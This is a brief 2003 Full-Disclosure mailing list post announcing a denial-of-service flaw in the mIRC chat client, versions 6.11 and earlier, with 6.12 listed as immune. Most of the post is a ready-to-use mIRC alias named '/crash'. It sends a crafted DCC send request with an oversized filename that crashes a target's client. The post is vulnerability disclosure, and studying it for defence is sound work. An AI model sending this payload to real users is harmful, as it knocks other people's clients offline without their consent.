[Full-Disclosure] Mirc Dos 6.11 and below

[VeNoMouS]

Pointless posting, but thought I would any way.

Vulnerable systems:
 * mIRC version 6.11 and prior

Immune systems:
 * mIRC version 6.12

It is possible to crash a mIRC client by sending a specially crafted DCC
request.

Exploit:
mIRC alias:
/crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+
$chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031015/cea20479/attachment.html